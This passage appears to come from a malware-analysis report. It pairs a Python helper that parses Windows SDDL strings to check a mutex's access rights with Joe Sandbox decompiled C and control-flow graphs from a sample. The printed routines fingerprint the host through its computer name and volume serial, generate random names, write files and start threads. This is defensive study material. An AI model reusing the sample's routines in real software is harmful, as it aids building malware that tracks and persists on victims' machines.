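ACE_RE = re.compile(r"\(([^()]*)\)")


def _acl_flags(text):
    """'PAI' -> ['P', 'AI']"""
    flags = []
    while text:
        for tok in ACL_FLAGS:
            if text.startswith(tok):
                flags.append(tok)
                text = text[len(tok):]
                break
        else:
            raise ValueError("unknown ACL flag in %r" % text)
    return flags


def _rights(text):
    """Rights are either a hex mask ('0x1F0001') or a run of two-letter tokens ('GAGR')."""
    if text.startswith("0x"):
        return int(text, 16)
    if len(text) % 2:
        raise ValueError("malformed rights run %r" % text)
    mask = 0
    for tok in (text[i:i + 2] for i in range(0, len(text), 2)):
        if tok not in RIGHTS:
            raise ValueError("unknown right %r" % tok)
        mask |= RIGHTS[tok]
    return mask


def _sid(text):
    return SID_ALIASES.get(text, text)   # literal "S-1-..." strings pass through


def parse_ace(inner):
    """'A;;GA;;;WD' (an ACE without its parentheses) -> dict; the two GUID fields are ignored."""
    fields = inner.split(";")
    if len(fields) != 6:
        raise ValueError("expected 6 ACE fields, got %d" % len(fields))
    ace_type, ace_flags, rights, _obj, _inh_obj, sid = fields
    if ace_type not in ACE_TYPES:
        raise ValueError("unsupported ACE type %r" % ace_type)
    return {"type": ACE_TYPES[ace_type], "flags": ace_flags,
            "mask": _rights(rights), "sid": _sid(sid)}


def parse_sddl(sddl):
    """Split O:/G:/D:/S: sections; O and G become SID strings, D and S become {flags, aces}."""
    marks = [(m.start(), m.group(1)) for m in SECTION_RE.finditer(sddl)]
    if not marks or marks[0][0] != 0:
        raise ValueError("SDDL must start with O:, G:, D: or S:")
    parsed = {}
    for i, (pos, key) in enumerate(marks):
        end = marks[i + 1][0] if i + 1 < len(marks) else len(sddl)
        body = sddl[pos + 2:end]
        if key in ("O", "G"):
            parsed[key] = _sid(body)
        else:
            parsed[key] = {"flags": _acl_flags(body.split("(", 1)[0]),
                           "aces": [parse_ace(a) for a in ACE_RE.findall(body)]}
    return parsed


def access_allowed(parsed, sid, desired):
    """In-order DACL walk for a single SID, simplified from AccessCheck: no group
    expansion, and only GENERIC_ALL is mapped (it satisfies or denies any request).
    An absent or empty DACL grants no rights here (a real NULL DACL grants everything)."""
    remaining = desired
    for ace in parsed.get("D", {}).get("aces", []):
        if ace["sid"] != sid:
            continue
        blanket = bool(ace["mask"] & RIGHTS["GA"])
        if ace["type"] == "ACCESS_DENIED" and (blanket or ace["mask"] & remaining):
            return False
        if ace["type"] == "ACCESS_ALLOWED":
            remaining = 0 if blanket else remaining & ~ace["mask"]
            if remaining == 0:
                return True
    return remaining == 0


# Constructed SDDL strings for the demo, not the sample's decrypted string.
OPEN_SDDL = "D:(A;;GA;;;WD)"                          # Everyone: GENERIC_ALL, any local process can open the object
LOCKED_SDDL = "O:BAG:SYD:P(A;;GA;;;SY)(A;;GA;;;BA)"   # protected DACL, SYSTEM and Administrators only

if __name__ == "__main__":
    for s in (OPEN_SDDL, LOCKED_SDDL):
        print(s, "-> Everyone GENERIC_ALL:", access_allowed(parse_sddl(s), "S-1-1-0", RIGHTS["GA"]))
```

A DACL like OPEN_SDDL is what makes a mutex-based single-instance check reachable from any session or integrity level; a DACL like LOCKED_SDDL confines the name to SYSTEM and Administrators. Run the recovered string through parse_sddl and access_allowed with S-1-1-0 to decide which case the sample is in.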

                          Control-flow Graph

Basic blocks (id: address range, calls -> successor blocks):
• 643: 6e7c50-6e7c6c -> 644, 645
• 644: 6e7efa-6e7f06 (no successors)
• 645: 6e7c72-6e7c8d call 6eb7a0 -> 648, 649
• 648: 6e7d4e-6e7d52 -> 652, 653
• 649: 6e7c93-6e7c96 -> 650, 651
• 650: 6e7c9c-6e7ca3 -> 651, 654
• 651: 6e7eed-6e7eef -> 644, 656
• 652: 6e7d54-6e7d6f call 6f4520 GetFileAttributesW -> 651, 653
• 653: 6e7d75-6e7d97 call 6e9db0 call 6f4610 -> 651, 670
• 654: 6e7ca9-6e7cad -> 651, 658
• 656: 6e7ef1-6e7ef7 call 6e91e0 -> 644
• 658: 6e7cb3-6e7cb7 -> 663, 664
• 663: 6e7cb9-6e7cbd -> 664, 667
• 664: 6e7ce5-6e7d0b call 6f30c0 call 6f6f80 -> 680, 681
• 667: 6e7cbf-6e7ce2 call 6f4520 call 6e6270 -> 664
• 670: 6e7d9d-6e7da7 -> 651, 673
• 673: 6e7dad-6e7db5 -> 676, 677
• 676: 6e7db7 -> 682
• 677: 6e7e04-6e7e08 -> 679
• 679: 6e7e0c-6e7e0e -> 684, 685
• 680: 6e7dd4 -> 689
• 681: 6e7d11-6e7d30 call 6f05c0 -> 689, 696
• 682: 6e7dba-6e7dc4 -> 687, 688
• 684: 6e7ece-6e7ee7 CreateThread Sleep -> 651
• 685: 6e7e14-6e7e1e -> 684, 690
• 687: 6e7e0a -> 679
• 688: 6e7dc6-6e7dcd -> 682, 692
• 689: 6e7dd6-6e7de0 -> 693, 694
• 690: 6e7e24 -> 695
• 692: 6e7dcf-6e7dd2 -> 679
• 693: 6e7df8-6e7dff call 6f03d0 -> 651
• 694: 6e7de2-6e7df5 call 6e91e0 -> 693
• 695: 6e7e27-6e7e29 -> 699, 700
• 696: 6e7d36-6e7d49 call 6e91e0 -> 689
• 699: 6e7e3a-6e7e40 -> 706, 707
• 700: 6e7e2b-6e7e35 -> 695, 704
• 704: 6e7e37 -> 699
• 706: 6e7e8d-6e7e92 -> 708, 709
• 707: 6e7e42-6e7e6b call 6f4520 call 6f7be0 -> 720, 721
• 708: 6e7e94-6e7e9d call 6e91e0 -> 709
• 709: 6e7ea2-6e7ecb call 6e3180 call 6ec400 -> 684
• 720: 6e7e6d-6e7e72 -> 721, 722
• 721: 6e7e88 -> 706
• 722: 6e7e74-6e7e7a -> 721, 723
• 723: 6e7e7c-6e7e86 lstrcmpiW -> 651, 721
                          C-Code - Quality: 97%
                          			E006E7C50() {
                          				long _t42;
                          				void* _t44;
                          				long _t45;
                          				long _t47;
                          				signed int _t49;
                          				long _t51;
                          				long _t54;
                          				intOrPtr _t55;
                          				signed int _t62;
                          				WCHAR* _t63;
                          				signed int _t64;
                          				signed int _t65;
                          				signed char _t67;
                          				long _t69;
                          				void* _t70;
                          				long _t71;
                          				struct _SECURITY_ATTRIBUTES* _t75;
                          				long _t80;
                          				signed int _t83;
                          				signed int _t86;
                          				signed int _t87;
                          				WCHAR* _t89;
                          				void* _t90;
                          				signed int _t91;
                          				signed int _t92;
                          				long _t93;
                          				signed int _t100;
                          				struct _SECURITY_ATTRIBUTES* _t102;
                          				void* _t104;
                          				WCHAR* _t107;
                          				void* _t108;
                          				DWORD* _t109;
                          				long* _t112;
                          
                          				_t42 =  *0x6f9b9c; // 0x2fd0d0
                          				_t102 = 0;
                          				 *(_t108 + 4) = 0;
                          				 *((intOrPtr*)(_t108 + 8)) = 0;
                          				if( *_t42 == 1) {
                          					L44:
                          					return _t102;
                          				}
                          				_t44 = E006EB7A0( *0x6f9c40);
                          				_t109 = _t108 + 4;
                          				_t104 = _t44;
                          				_t45 =  *0x6f9b9c; // 0x2fd0d0
                          				_t102 = 0;
                          				_t90 =  *_t45;
                          				if(_t90 == 0) {
                          					__eflags =  *(_t45 + 0x10);
                          					if(__eflags != 0) {
                          						L13:
                          						E006E9DB0(__eflags);
                          						_t47 =  *0x6f9b9c; // 0x2fd0d0
                          						_t49 = E006F4610(_t109[0x3c], 0x19, _t47 + 4);
                          						_t109 =  &(_t109[3]);
                          						__eflags = _t49;
                          						if(_t49 == 0) {
                          							L42:
                          							if(_t104 != 0) {
                          								E006E91E0(_t104);
                          							}
                          							goto L44;
                          						}
                          						_t51 =  *0x6f9b9c; // 0x2fd0d0
                          						_t25 = _t51 + 4; // 0x0
                          						_t91 =  *_t25;
                          						__eflags = _t91;
                          						if(_t91 == 0) {
                          							goto L42;
                          						}
                          						__eflags =  *_t91;
                          						_t109[3] = _t51;
                          						if( *_t91 == 0) {
                          							_t100 = _t91;
                          							_t83 = _t91;
                          							L26:
                          							__eflags = _t100 - _t91;
                          							if(_t100 <= _t91) {
                          								L41:
                          								_t102 = 0;
                          								__eflags = 0;
                          								CreateThread(0, 0, E006F6DB0, 0, 0, _t109);
                          								Sleep(0x1f4);
                          								goto L42;
                          							}
                          							__eflags = _t83 - _t91 - 0x3ff;
                          							if(_t83 - _t91 > 0x3ff) {
                          								goto L41;
                          							}
                          							_t32 = _t100 - 2; // 0x0
                          							_t107 = _t32;
                          							while(1) {
                          								__eflags = _t107 - _t91;
                          								if(_t107 <= _t91) {
                          									break;
                          								}
                          								_t65 =  *_t107 & 0x0000ffff;
                          								_t107 =  &(_t107[0xffffffffffffffff]);
                          								__eflags = _t65 - 0x2f;
                          								if(_t65 != 0x2f) {
                          									continue;
                          								}
                          								_t107 =  &(_t107[2]);
                          								__eflags = _t107;
                          								break;
                          							}
                          							_t54 = _t109[3];
                          							__eflags = _t107 - _t100;
                          							if(_t107 >= _t100) {
                          								L38:
                          								_t38 = _t54 + 0x14; // 0x0
                          								_t92 =  *_t38;
                          								__eflags = _t92;
                          								if(_t92 != 0) {
                          									E006E91E0(_t92);
                          									_t109 =  &(_t109[1]);
                          									_t54 =  *0x6f9b9c; // 0x2fd0d0
                          								}
                          								_t86 = _t83 + 0x00000002 - _t107 & 0xfffffffe;
                          								__eflags = _t86;
                          								 *(_t54 + 0x18) = _t86;
                          								_t55 = E006E3180(_t86, 0);
                          								_t93 =  *0x6f9b9c; // 0x2fd0d0
                          								 *((intOrPtr*)(_t93 + 0x14)) = _t55;
                          								_t41 = _t93 + 0x18; // 0x0
                          								E006EC400(_t55, _t107,  *_t41);
                          								_t109 =  &(_t109[5]);
                          								goto L41;
                          							}
                          							E006F4520( &(_t109[5]), 0x9e);
                          							_t112 =  &(_t109[2]);
                          							_t62 = E006F7BE0( &(_t112[7]),  &(_t112[7]), _t112,  &(_t112[4]));
                          							_t109 =  &(_t112[3]);
                          							__eflags = _t62;
                          							if(_t62 == 0) {
                          								L37:
                          								_t54 =  *0x6f9b9c; // 0x2fd0d0
                          								goto L38;
                          							}
                          							_t63 =  *_t109;
                          							__eflags = _t63;
                          							if(_t63 == 0) {
                          								goto L37;
                          							}
                          							__eflags = _t109[4];
                          							if(_t109[4] == 0) {
                          								goto L37;
                          							}
                          							_t64 = lstrcmpiW(_t107, _t63);
                          							__eflags = _t64;
                          							if(_t64 == 0) {
                          								goto L42;
                          							}
                          							goto L37;
                          						}
                          						_t27 = _t91 + 2; // 0x2
                          						_t87 = _t27;
                          						while(1) {
                          							_t100 = _t87;
                          							__eflags = _t87 - _t91 - 0x400;
                          							if(_t87 - _t91 >= 0x400) {
                          								break;
                          							}
                          							__eflags =  *_t100;
                          							_t28 = _t100 + 2; // 0x4
                          							_t87 = _t28;
                          							if( *_t100 != 0) {
                          								continue;
                          							}
                          							_t83 = _t87 + 0xfffffffe;
                          							goto L26;
                          						}
                          						_t83 = _t100;
                          						goto L26;
                          					}
                          					_t89 =  &(_t109[5]);
                          					E006F4520(_t89, 0x9e);
                          					_t109 =  &(_t109[2]);
                          					_t67 = GetFileAttributesW(_t89); // executed
                          					__eflags = _t67 & 0x00000010;
                          					if(__eflags != 0) {
                          						goto L42;
                          					}
                          					goto L13;
                          				}
                          				if(_t90 != 2) {
                          					goto L42;
                          				}
                          				_t102 = 0;
                          				 *_t45 = 0;
                          				if( *((intOrPtr*)(_t45 + 8)) != 0 &&  *((intOrPtr*)(_t45 + 0xc)) != 0) {
                          					if( *((intOrPtr*)(_t45 + 0x14)) != 0 &&  *((intOrPtr*)(_t45 + 0x18)) != 0) {
                          						E006F4520( &(_t109[5]), 0x9e);
                          						_t80 =  *0x6f9b9c; // 0x2fd0d0
                          						_t8 = _t80 + 0x18; // 0x0
                          						_t9 = _t80 + 0x14; // 0x0
                          						E006E6270(_t80,  &(_t109[5]),  *_t9,  *_t8);
                          						_t109 =  &(_t109[5]);
                          					}
                          					E006F30C0(_t109);
                          					_t69 =  *0x6f9b9c; // 0x2fd0d0
                          					_t12 = _t69 + 0xc; // 0x0
                          					_t13 = _t69 + 8; // 0x0
                          					_t70 = E006F6F80( *_t13,  *_t12,  &(_t109[1]),  &(_t109[2]));
                          					_t109 =  &(_t109[4]);
                          					_t121 = _t70;
                          					if(_t70 == 0) {
                          						_t102 = 0;
                          						__eflags = 0;
                          					} else {
                          						_push(_t109[0x3d]);
                          						_push(_t109[3]);
                          						_push(_t109[3]);
                          						_t75 = E006F05C0(_t121);
                          						_t109 =  &(_t109[3]);
                          						_t102 = _t75;
                          						_t76 = _t109[1];
                          						if(_t109[1] != 0) {
                          							E006E91E0(_t76);
                          							_t109 =  &(_t109[1]);
                          							_t109[1] = 0;
                          							_t109[2] = 0;
                          						}
                          					}
                          					_t71 =  *0x6f9b9c; // 0x2fd0d0
                          					_t29 = _t71 + 8; // 0x0
                          					_t72 =  *_t29;
                          					if( *_t29 != 0) {
                          						E006E91E0(_t72);
                          						_t109 =  &(_t109[1]);
                          						_t72 =  *0x6f9b9c; // 0x2fd0d0
                          						 *((intOrPtr*)(_t72 + 8)) = 0;
                          						 *((intOrPtr*)(_t72 + 0xc)) = 0;
                          					}
                          					E006F03D0(_t72);
                          				}
                          			}

                          APIs
                          • GetFileAttributesW.KERNELBASE(?), ref: 006E7D67
                          • lstrcmpiW.KERNEL32(-00000002,00000000), ref: 006E7E7E
                          • CreateThread.KERNEL32(00000000,00000000,006F6DB0,00000000,00000000), ref: 006E7EDC
                          • Sleep.KERNEL32(000001F4), ref: 006E7EE7
                            • Part of subcall function 006E6270: CreateFileW.KERNEL32(006F077D,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 006E628D
                            • Part of subcall function 006E6270: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 006E62A8
                            • Part of subcall function 006E6270: CloseHandle.KERNEL32(00000000), ref: 006E62B6
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: File$Create$AttributesCloseHandleSleepThreadWritelstrcmpi
                          • String ID:
                          • API String ID: 357108698-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 97%
                          			E006F5D00(signed int __edx) {
                          				struct _OSVERSIONINFOW* _t26;
                          				WCHAR* _t28;
                          				int _t30;
                          				WCHAR* _t31;
                          				WCHAR* _t34;
                          				signed int _t35;
                          				signed int _t39;
                          				intOrPtr _t41;
                          				intOrPtr _t42;
                          				WCHAR* _t48;
                          				signed short _t49;
                          				signed int _t52;
                          				signed int _t53;
                          				void* _t59;
                          				signed short _t61;
                          				signed short _t62;
                          				intOrPtr _t63;
                          				DWORD* _t65;
                          				signed int _t66;
                          				signed short _t67;
                          				WCHAR* _t68;
                          				void* _t69;
                          				intOrPtr* _t72;
                          				DWORD* _t73;
                          				signed int* _t74;
                          				signed int* _t77;
                          				void* _t78;
                          
                          				_t58 = __edx;
                          				_t61 = 0;
                          				_t78 =  *0x6f9ac0 - _t61; // 0x2f87c8
                          				 *_t72 = 0;
                          				if(_t78 == 0) {
                          					_t26 = _t72 + 8;
                          					_t26->dwOSVersionInfoSize = 0x11c;
                          					GetVersionExW(_t26);
                          					_t28 = E006E3180(0x410, 0);
                          					_t73 = _t72 + 8;
                          					if(_t28 == 0) {
                          						L2:
                          						return _t61;
                          					}
                          					_t65 = _t73;
                          					_t48 = _t28;
                          					 *_t65 = 0x208;
                          					_t30 = GetComputerNameW(_t28, _t65); // executed
                          					if(_t30 == 0) {
                          						_t31 = E006E3180(0x474, _t48);
                          						_t73 =  &(_t73[2]);
                          						_t48 = _t31;
                          						GetComputerNameW(_t31, _t65);
                          						_t66 = 0x23a;
                          					} else {
                          						_t66 = 0x208;
                          					}
                          					E006F31C0(_t48, 0x5f);
                          					_t74 =  &(_t73[2]);
                          					_t68 =  &(_t48[_t66]);
                          					_t74[1] = _t48;
                          					do {
                          						_t34 = _t48;
                          						_t48 =  &(_t48[1]);
                          					} while (_t34 < _t68 && ( *_t34 & 0x0000ffff) != 0);
                          					if(_t34 < _t68) {
                          						 *((intOrPtr*)(_t48 - 2)) = 0x57005f;
                          						E006F4520( &(_t74[0x49]), 0x76);
                          						_t77 =  &(_t74[2]);
                          						_push(_t77[5]);
                          						_push(_t77[5]);
                          						E006F68E0( &(_t48[1]), _t68 -  &(_t48[1]) >> 1,  &(_t77[0x4c]), _t77[5]);
                          						_t74 =  &(_t77[6]);
                          					}
                          					_t52 = _t74[1];
                          					if(_t52 == 0) {
                          						L17:
                          						 *_t74 = 0;
                          						goto L2;
                          					} else {
                          						_t35 = 0;
                          						while( *((short*)(_t52 + _t35 * 2)) != 0) {
                          							_t35 = _t35 + 1;
                          							if(_t66 != _t35) {
                          								continue;
                          							}
                          							 *_t74 = 0;
                          							goto L17;
                          						}
                          						_t69 = 0;
                          						_t62 = 0;
                          						_t49 = 0;
                          						 *_t74 = _t35;
                          						do {
                          							_t67 = _t49;
                          							do {
                          								_t49 = E006E8160(_t58) & 0x0000000f;
                          							} while (_t49 == _t67 && _t49 == _t62);
                          							Sleep(1);
                          							_t53 = _t49 & 0x0000ffff;
                          							_t39 =  *_t74;
                          							_t62 = _t67;
                          							_t59 = _t53 + 0x41;
                          							_t55 =  <=  ? _t59 : _t53 + 0x2a;
                          							_t69 = _t69 + 1;
                          							 *((short*)(_t74[1] + _t39 * 2)) =  <=  ? _t59 : _t53 + 0x2a;
                          							_t19 = _t39 + 1; // 0x1
                          							_t58 = _t19;
                          							 *_t74 = _t19;
                          						} while (_t69 != 0x20);
                          						 *((short*)(_t74[1] + 2 + _t39 * 2)) = 0;
                          						 *_t74 = _t39 + _t39 + 4;
                          						_t41 = E006E3180(_t39 + _t39 + 4, _t74[1]);
                          						if(_t41 == 0) {
                          							_t61 = 0;
                          							goto L2;
                          						}
                          						_t63 = _t41;
                          						_t42 =  *0x6f9ac0; // 0x2f87c8
                          						if(_t42 != 0) {
                          							E006E91E0(_t42);
                          						}
                          						 *0x6f9ac0 = _t63;
                          						goto L1;
                          					}
                          				}
                          				L1:
                          				_t61 = 1;
                          				goto L2;
                          			}

                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 006F5D32
                          • GetComputerNameW.KERNEL32(00000000), ref: 006F5D57
                            • Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
                            • Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0
                          • GetComputerNameW.KERNEL32(00000000), ref: 006F5D7A
                            • Part of subcall function 006E8160: GetTickCount.KERNEL32(?,?,?,006E9394), ref: 006E8169
                          • Sleep.KERNEL32(00000001), ref: 006F5E36
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: ComputerHeapName$AllocateCountProcessSleepTickVersion
                          • String ID:
                          • API String ID: 3448490110-0
                          • Opcode ID: 80525e0abda4a641b8c635c3ea504b423f9db70a7ba3e1dffe5006474b2ba9a0
                          • Instruction ID: 113aaf42e648de27a971c331630c30f16218de3bfc4115c107b35379b3c4ebc7
                          • Opcode Fuzzy Hash: 80525e0abda4a641b8c635c3ea504b423f9db70a7ba3e1dffe5006474b2ba9a0
                          • Instruction Fuzzy Hash: E9412AB15047085BDB20AF64DC89ABB76EAEF84344F05442DE78AC7352F7748D05CB66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph (image; node and edge data recovered from the page)

                          • Legend: Executed / Not Executed (node colouring in the image)
                          • 907: 6f3200-6f322d, call 6f6610, GetWindowsDirectoryW; edges 907->910, 907->911
                          • 910: 6f322f-6f3234; edge 910->912
                          • 911: 6f3236-6f323a; edge 911->912
                          • 912: 6f3241-6f3291, GetVolumeInformationW; edge 912->913
                          • 913: 6f3296-6f329d; edges 913->913, 913->914
                          • 914: 6f329f-6f32e7, call 6f4520 * 2, call 6f68e0
                          C-Code - Quality: 92%
			E006F3200(void* __eflags, intOrPtr _a4) {
				char _v216;
				signed short _v736;
				char _v752;
				intOrPtr _v758;
				signed int _v762;
				short _v764;
				intOrPtr _v768;
				short _t20;
				void* _t24;
				signed int _t28;
				signed int _t29;
				WCHAR* _t32;
				signed int _t33;
				WCHAR* _t34;
				intOrPtr _t37;
				DWORD* _t38;
				void* _t40;
				intOrPtr* _t41;
				DWORD* _t42;

				_t41 = _t40 - 0x2f4; /* 0x006f3204 */
				_t34 =  &_v736; /* 0x006f3211 */
				 *_t41 = 0; /* 0x006f3215 */
				E006F6610(_t34, 0, 0x208); /* 0x006f321b */
				_t42 = _t41 + 0xc; /* 0x006f3220 */
				if(GetWindowsDirectoryW(_t34, 0x208) == 0) { /* 0x006f322d */
					_t20 = 0x43; /* 0x006f3236 */
					_v736 = 0x43; /* 0x006f323a */
				} else { /* 0x006f322f */
					_t20 = _v736 & 0x0000ffff; /* 0x006f322f */
				} /* 0x006f322f */
				_t37 = _a4; /* 0x006f3241 */
				_t32 =  &_v752; /* 0x006f3248 */
				_t38 = _t42; /* 0x006f324c */
				 *_t32 = _t20; /* 0x006f324e */
				_t32[1] = 0x5c003a; /* 0x006f3253 */
				_t32[3] = 0; /* 0x006f325a */
				GetVolumeInformationW(_t32, 0, 0, _t38, 0, 0, 0, 0); /* 0x006f3268 */ // executed
				_t28 =  *_t38; /* 0x006f326e */
				_t35 = _t28 + _t28; /* 0x006f3271 */
				_t29 = _t28 << 3; /* 0x006f327b */
				_v768 = _t28 + _t28; /* 0x006f327e */
				_v764 = _t28 * 4; /* 0x006f3282 */
				_t24 = 0xfffffff8; /* 0x006f3287 */
				_t33 = _t29; /* 0x006f328c */
				 *_t38 = _t29; /* 0x006f328e */
				_v762 = _t29; /* 0x006f3291 */
				do { /* 0x006f3296 */
					_t33 = _t33 + _t33; /* 0x006f3296 */
					 *(_t42 + _t24 + 0x14) = _t33; /* 0x006f3298 */
					_t24 = _t24 + 1; /* 0x006f329c */
				} while (_t24 != 0); /* 0x006f329c */
				 *_t42 = _t33; /* 0x006f329f */
				E006F4520(_t37, 0xb0); /* 0x006f32a8 */
				E006F4520( &_v216, 0xb1); /* 0x006f32bd */
				_push(_v758); /* 0x006f32ce */
				_push(_t29 & 0x0000fff8 | 0x00000001); /* 0x006f32d2 */
				return E006F68E0(_t37, 0x64,  &_v216, _t35); /* 0x006f32e7 */
			}

                          APIs
                          • GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 006F3225
                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 006F3268
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: DirectoryInformationVolumeWindows
                          • String ID: C
                          • API String ID: 3487004747-1037565863
                          • Opcode ID: a6a0355c80568cca8c29e6b6ff27465d6bd9b73777dbbcc3b1363e7bf602fee0
                          • Instruction ID: 73aad1e1aa54b6058f7982ce9dbc441a384eb9e57fd7f0ffe806e9dfa4fe0186
                          • Opcode Fuzzy Hash: a6a0355c80568cca8c29e6b6ff27465d6bd9b73777dbbcc3b1363e7bf602fee0
                          • Instruction Fuzzy Hash: 2921F270508304ABE710AF14EC85B7B7BEDEF85748F00442CF948D6241E7359A09C7B6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 16%
			E006ED8B0(intOrPtr* __ecx) {
				intOrPtr _t7;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t15;
				intOrPtr* _t20;
				void* _t21;
				intOrPtr _t23;

				 *((short*)(__ecx + 0x14)) = 0; /* 0x006ed8bb */
				_t20 = __ecx; /* 0x006ed8c1 */
				 *((intOrPtr*)(__ecx + 0x10)) = 0; /* 0x006ed8c3 */
				 *((intOrPtr*)(__ecx + 0xc)) = 0; /* 0x006ed8c6 */
				 *((intOrPtr*)(__ecx + 8)) = 0; /* 0x006ed8c9 */
				 *((intOrPtr*)(__ecx + 4)) = 0; /* 0x006ed8cc */
				_t23 =  *0x6f9bb4; /* 0x006ed8cf */ // 0x1
				if(_t23 == 0) { /* 0x006ed8d5 */
					_t15 = _t21; /* 0x006ed8d7 */
					E006F4520(_t15, 0x7a); /* 0x006ed8dc */
					_t12 =  *0x6f9da8(_t15, 0, 0, 0, 0); /* 0x006ed8e9 */ // executed
					 *0x6f9adc = _t12; /* 0x006ed8ef */
					 *0x6f9dbc(_t12, 0x15f90, 0x15f90, 0x2bf20, 0x927c0); /* 0x006ed906 */
					InitializeCriticalSectionAndSpinCount(0x6f9b64, 0x800); /* 0x006ed916 */
					 *0x6f9bb4 =  *0x6f9bb4 + 1; /* 0x006ed91c */
				} /* 0x006ed91c */
				 *0x6f9d54(0x6f9b64); /* 0x006ed928 */
				_t7 =  *0x6f9c24; /* 0x006ed92e */ // 0x1
				_t8 = _t7 + 1; /* 0x006ed933 */
				 *0x6f9c24 = _t8; /* 0x006ed934 */
				 *_t20 = _t8; /* 0x006ed939 */
				 *0x6f9d9c(0x6f9b64); /* 0x006ed93c */
				return _t20; /* 0x006ed94d */
			}

                          APIs
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(006F9B64,00000800,?,00000000,00000000,00000000,00000000), ref: 006ED916
                          • RtlEnterCriticalSection.NTDLL(006F9B64), ref: 006ED928
                          • RtlLeaveCriticalSection.NTDLL(006F9B64), ref: 006ED93C
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: CriticalSection$CountEnterInitializeLeaveSpin
                          • String ID:
                          • API String ID: 29772495-0
                          • Opcode ID: 0b301f34b93b771aba26fcb789bd4d5edc0e3d6c79141eb8be6a9f98e1e0cd2b
                          • Instruction ID: 1021c57af294f0b9aab2d32dc9df6476acaae61a81e3e7fb74d21e4081c3b007
                          • Opcode Fuzzy Hash: 0b301f34b93b771aba26fcb789bd4d5edc0e3d6c79141eb8be6a9f98e1e0cd2b
                          • Instruction Fuzzy Hash: D101CCB0A00200AFC3109F29FD89F337ABAEFC5706B20602EB5489A261DA754802CB70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
			E006E3180(signed int _a4, void* _a8) {
				void* _t3;
				void* _t4;
				long _t9;
				signed int _t10;
				void* _t11;

				_t3 =  *0x6f9c2c; /* 0x006e3182 */ // 0x2b0000
				_t11 = _a8; /* 0x006e3187 */
				_t10 = _a4; /* 0x006e318b */
				if(_t3 == 0) { /* 0x006e3191 */
					_t3 = GetProcessHeap(); /* 0x006e3193 */
					 *0x6f9c2c = _t3; /* 0x006e3199 */
				} /* 0x006e3199 */
				_t9 = ( ~_t10 & 0x0000000f) + _t10; /* 0x006e31a5 */
				if(_t11 == 0) { /* 0x006e31a9 */
					_t4 = RtlAllocateHeap(_t3, 8, _t9); /* 0x006e31bc */ // executed
					return _t4;
				} else { /* 0x006e31ab */
					return RtlReAllocateHeap(_t3, 8, _t11, _t9);
				} /* 0x006e31b0 */
			}

                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
                          • RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0
                          • RtlAllocateHeap.NTDLL(002B0000,00000008,?), ref: 006E31BC
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Heap$Allocate$Process
                          • String ID:
                          • API String ID: 980559045-0
                          • Opcode ID: 237dc0fd949bfb41448f3265c8fc31567297a9166f06f138131c4969cfba5c7a
                          • Instruction ID: 0c4bca6c20829b5b21ab4b62561a2e555249d56bec029b71b6ede3c655fc5011
                          • Opcode Fuzzy Hash: 237dc0fd949bfb41448f3265c8fc31567297a9166f06f138131c4969cfba5c7a
                          • Instruction Fuzzy Hash: 47E06DB2681360ABDB188B26EC0DBFA37ABEBC4711B08550DF901D7344DA70A800CB70
                          Uniqueness

                          Uniqueness Score: -1.00%

